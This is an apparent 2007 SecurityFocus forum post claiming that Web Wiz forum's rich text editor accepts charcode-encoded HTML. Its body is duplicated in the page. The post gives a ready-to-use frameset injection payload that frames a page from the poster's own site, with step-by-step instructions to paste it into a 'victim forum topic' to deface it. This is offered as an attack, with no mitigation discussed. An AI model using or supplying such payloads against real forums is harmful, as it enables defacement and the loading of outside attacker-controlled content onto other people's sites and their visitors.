Back to list
|
Post reply
Webwiz vulnerable
Jun 11 2007 12:43AM
spymaster spykod net
Webwiz vulnerable
Versiyon: all versions are vulnerable
Poc:
it's vulnerable because of the rich text editor it accept codes which are dangerous
When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz
the code is this
<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0>
<frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset>
hex it with charcode
then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : )
spymaster (at) spykod (dot) net [email concealed]
www.spykod.net
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Versiyon: all versions are vulnerable
Poc:
it's vulnerable because of the rich text editor it accept codes which are dangerous
When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz
the code is this
<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0>
<frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset>
hex it with charcode
then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : )
spymaster (at) spykod (dot) net [email concealed]
www.spykod.net
[ reply ]